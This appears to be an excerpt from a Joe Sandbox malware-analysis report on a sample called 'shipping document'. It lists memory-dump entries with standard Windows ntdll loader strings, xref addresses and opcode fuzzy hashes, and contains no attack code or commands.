                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-2558761708
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017E20F3
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017E2104
                                                                                                • LdrpInitializationFailure, xrefs: 017E20FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2986994758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: #%u
                                                                                                • API String ID: 48624451-232158463
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • LdrResSearchResource Enter, xrefs: 0176AA13
                                                                                                • LdrResSearchResource Exit, xrefs: 0176AA25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                • API String ID: 0-4066393604
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$MUI
                                                                                                • API String ID: 0-17815947
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0176063D
                                                                                                • kLsE, xrefs: 01760540
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                • API String ID: 0-2547482624
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0176A2FB
                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0176A309
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                • API String ID: 0-2876891731
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                • API String ID: 2994545307-4008356553
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: MUI
                                                                                                • API String ID: 0-1339004836
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GlobalTags
                                                                                                • API String ID: 0-1106856819
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .mui
                                                                                                • API String ID: 0-1199573805
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: EXT-
                                                                                                • API String ID: 0-1948896318
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #
                                                                                                • API String ID: 0-1885708031
                                                                                                • Opcode ID: 628f22093323c66bf1eb4b2ef51f3da8cdcab81ed3d5fc0497f3acd825b79035
                                                                                                • Instruction ID: 1e48d74d09a5a99ec77f386e31dcafe2325a9033bc6d18b37e33085a911cba9b
                                                                                                • Opcode Fuzzy Hash: 628f22093323c66bf1eb4b2ef51f3da8cdcab81ed3d5fc0497f3acd825b79035
                                                                                                • Instruction Fuzzy Hash: 1A311431A007099AEB22DB69C854BAFFBA8DF45704F54406CFA81AB382C775ED05CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                • Opcode ID: ca822a2ae4171f1d2ecaa636e461e04ef32aed361e699bcbaf2fe2a9e4b19316
                                                                                                • Instruction ID: 0198f0c935a5056251171e6c6f41dfad950eac14a6b221270c3caa4d94516eea
                                                                                                • Opcode Fuzzy Hash: ca822a2ae4171f1d2ecaa636e461e04ef32aed361e699bcbaf2fe2a9e4b19316
                                                                                                • Instruction Fuzzy Hash: EE31E17690051AAFEB16DB59C845E6FFB74EB80720F01416DEA05AB291D730EE04EBE0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017E895E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                • API String ID: 0-702105204
                                                                                                • Opcode ID: 7b7702d589a2dd2da604d88d1374a9bb1e3e0060a102ac2ddec6770c0b5507a5
                                                                                                • Instruction ID: 3259a7d9a61050475aa3a7e2158b9bf1cd06d454478b1288740550628aa2113d
                                                                                                • Opcode Fuzzy Hash: 7b7702d589a2dd2da604d88d1374a9bb1e3e0060a102ac2ddec6770c0b5507a5
                                                                                                • Instruction Fuzzy Hash: 1C012B36A00301DFE7315B59DC8CA6AFFE5EF89394B04105CFA820B155CB24B840C793
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbfbf73c450149eb9e7baad7081e223e82966c4628ea67f873770c2ff2d112c2
                                                                                                • Instruction ID: c76448264e366646380eed65d5867dc18d1097651077ddcad7988850e5e1d658
                                                                                                • Opcode Fuzzy Hash: cbfbf73c450149eb9e7baad7081e223e82966c4628ea67f873770c2ff2d112c2
                                                                                                • Instruction Fuzzy Hash: F0A12731F40655AFEB21EB6CC848FADFBB5EB00B14F150169EA11AB291DB749D40CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 540f7256d56594ff606c88cc48c4bb207b42498a0942806a1b8a968586d107ad
                                                                                                • Instruction ID: a7b46e8e089b76d851d33b36640889005cc036ac0f4432703b188337166952ef
                                                                                                • Opcode Fuzzy Hash: 540f7256d56594ff606c88cc48c4bb207b42498a0942806a1b8a968586d107ad
                                                                                                • Instruction Fuzzy Hash: 8AA1E470B0071A9FDB25DF69C490BAAF7B1FF94314F504629FA0597282EB38E811CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ccd58551ab4d8946ed5143df3ee5a1e929413fb3302108886d317ddbd4c2adf3
                                                                                                • Instruction ID: 006dd22f3de7a909b4996cae74d144812ddad83feb4b55d1d4fc393af84118f5
                                                                                                • Opcode Fuzzy Hash: ccd58551ab4d8946ed5143df3ee5a1e929413fb3302108886d317ddbd4c2adf3
                                                                                                • Instruction Fuzzy Hash: CAA1BD72A046129FDB12DF28C984B5ABBE9FF88704F590A28E545DB651D334EE00CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                • Instruction ID: 4f210fdd375c48addb2fe39015eb14a4bef99c8fd8c869b4e357d9a3428ae59f
                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                • Instruction Fuzzy Hash: 4CB13971E0061ADFDF19CFA9C884AADB7B6BF88310F188129E914E7355D730AA41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 04efd46d47053e8df287ec2350e92175637c1d8daeb1b93eb66aafe404272f23
                                                                                                • Instruction ID: 5df7bb3c23eb9846b08538fdd836e4e485090e76e1fd7b79d2fb3466e24eb499
                                                                                                • Opcode Fuzzy Hash: 04efd46d47053e8df287ec2350e92175637c1d8daeb1b93eb66aafe404272f23
                                                                                                • Instruction Fuzzy Hash: 00919E71E04216AFDF15CFA8D888BAEFBF9AB58710F154169F610EB245D734E9009BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a5055e757f60a99296db21e5000b5536b97b90a4b73cd7a3a7e8dd1ec6099acc
                                                                                                • Instruction ID: 1db85fc20cffffe2c4ad890230dfe53fbedc5167a516e77b288b2e87f0e35338
                                                                                                • Opcode Fuzzy Hash: a5055e757f60a99296db21e5000b5536b97b90a4b73cd7a3a7e8dd1ec6099acc
                                                                                                • Instruction Fuzzy Hash: 87912431A00616CBEF24DB6CC884BBEFBA1EF94B14F2541A9EE059B345FA34D941CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b654800d747ecf47fa471aef69e2651178a94361e8d4e166cc740d7a4531b6bd
                                                                                                • Instruction ID: 50116fadc3f2091b6efd2969103cd79bea17852906703c67ab97da337a5fb2f4
                                                                                                • Opcode Fuzzy Hash: b654800d747ecf47fa471aef69e2651178a94361e8d4e166cc740d7a4531b6bd
                                                                                                • Instruction Fuzzy Hash: B6815E71A0061A9BDB24CF69C990AFEFBF9FB48700F14852EE655D7640E334E940CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction ID: 5cd560662c1b2b34f2bcc2ac28c0cf7fd34025aebedddc76293c3adce474c566
                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction Fuzzy Hash: FF817171A0021A9FDF1ECF58C480AAEBBF2BF84310F148569D916DB785D774DA81CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b914a1c4cadb961ca34b2d0058c3305e5bb427717eb319ca8ad9ec36e087ebb6
                                                                                                • Instruction ID: 2c3945685d591a0194ad0883ac1dfd9d10ff4aae8f99f7c38ab5437125d30718
                                                                                                • Opcode Fuzzy Hash: b914a1c4cadb961ca34b2d0058c3305e5bb427717eb319ca8ad9ec36e087ebb6
                                                                                                • Instruction Fuzzy Hash: 32813E71A00609AFDF25CFA9D880AEEFBB9FF88354F144429E555A7250DB30AD49CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dc6913c27c1b09f8972db054a6c8968637579bfef8baac5273a558812997a020
                                                                                                • Instruction ID: 19926d006fa0d3e232164dc09adcc42c43237fd3c076dcbf3e0e31760329f316
                                                                                                • Opcode Fuzzy Hash: dc6913c27c1b09f8972db054a6c8968637579bfef8baac5273a558812997a020
                                                                                                • Instruction Fuzzy Hash: 7171BD75D046269BCB268F58D8907BEFBB0FF5CB10F1441AEE942AB350E7349940CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bbee8980527724012d73b5b637f6fd33b82c627e7eb7e8c6b6040b189c7f004b
                                                                                                • Instruction ID: 66937dcd52378cd94d0e00c13b97e2b0e31bc6983e14fc783ead4021516573fb
                                                                                                • Opcode Fuzzy Hash: bbee8980527724012d73b5b637f6fd33b82c627e7eb7e8c6b6040b189c7f004b
                                                                                                • Instruction Fuzzy Hash: 53718FB2900305EFDB20CF59D944A9ABBF9EB84300F65465AE601EB26DE7358B40CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 86a5fe46c7ea770314d2969e5016f331956f8952c571b440ce916ef52907ffbb
                                                                                                • Instruction ID: 62d15e4f2e4cef0e81b1741e78ed5655478b7c71558289a141b6dac70d0b75c5
                                                                                                • Opcode Fuzzy Hash: 86a5fe46c7ea770314d2969e5016f331956f8952c571b440ce916ef52907ffbb
                                                                                                • Instruction Fuzzy Hash: D471D0356042428FD712DF2CC484B2AF7E5FF84710F0485AAE9A8CB756DB34D986CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                • Instruction ID: b4112b8d9f280ae2618a84be689b58bf35c88562d055a3d0da8b2cecc7e53df3
                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                • Instruction Fuzzy Hash: F9716D71A0060AAFDB10DFA9C988EAEFBF9FF58300F104569E505E7294DB70EA01CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 46f52b72c1d28728aac9d2f1cfb9dccb79079dc5ad207bfa341c514381f2f0ee
                                                                                                • Instruction ID: 0590ac56d091b620d3078c24c81ecef40269b7caf81a3ebcde3851aec57c6919
                                                                                                • Opcode Fuzzy Hash: 46f52b72c1d28728aac9d2f1cfb9dccb79079dc5ad207bfa341c514381f2f0ee
                                                                                                • Instruction Fuzzy Hash: 28719D32200601AFEB229F18C848F67FBA6EF44760F15492CF7568B7A1D775EA44DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bd97fee10af106d85838c068a2a24ad6f53b3cce2f001c4d3089b1292463a73a
                                                                                                • Instruction ID: 27fe88fba05d15950a2cd5566f09197c17ed5fcc242bb74924a3e076de0824e6
                                                                                                • Opcode Fuzzy Hash: bd97fee10af106d85838c068a2a24ad6f53b3cce2f001c4d3089b1292463a73a
                                                                                                • Instruction Fuzzy Hash: E481AD72A083068FDB24CF9CD484BADF7B6FB48714F16416DD904AB286D7789E81CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdff279cdba5582bb0addd2d6dfef953435e93abf22c91d157b41ae435a1c7d0
                                                                                                • Instruction ID: 3922b8dc9b2ef6f04aefe259adb0e8918b87f8c10c53b0f42c7cd61a5243cebf
                                                                                                • Opcode Fuzzy Hash: fdff279cdba5582bb0addd2d6dfef953435e93abf22c91d157b41ae435a1c7d0
                                                                                                • Instruction Fuzzy Hash: C3418E35980205CFDF25EF6CD4947A9FBB0FB58720F24019AD511BB295EB389A80CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23c7c52eb76ea56b9be04935cca81a6c84f45aa2c4791745e8ef9f56faa80ac6
                                                                                                • Instruction ID: c24f8cbff53391ad36aab10157f4338961dc96d69356da27bab99504b0258fda
                                                                                                • Opcode Fuzzy Hash: 23c7c52eb76ea56b9be04935cca81a6c84f45aa2c4791745e8ef9f56faa80ac6
                                                                                                • Instruction Fuzzy Hash: B741F232900302CBD724DF5CD884A5AFBB9FF98704F14816EDD019B65AD7799A82CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0bb9956d24d512efe832b92d1cd28a171241c74d9d39bfbab283c00666937c56
                                                                                                • Instruction ID: 34e9d8b1ffd37247f3db3d24b6d6586ec7ee9e75c1cfeb9082e02279e3e705e5
                                                                                                • Opcode Fuzzy Hash: 0bb9956d24d512efe832b92d1cd28a171241c74d9d39bfbab283c00666937c56
                                                                                                • Instruction Fuzzy Hash: A24129315083469FE312DF698880AABF7E9EF88B54F40092AF994D7250E771DE058B93
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                • Instruction ID: e7f2e7702db855a890e68141a1f76627a06036b873d8f4d5e6b82af3a5699ccc
                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                • Instruction Fuzzy Hash: F2412731A00211EFDB61DE698494BFAFBB1EB50764F15817AED498B244E772CD80CB90
                                                                                                Uniqueness

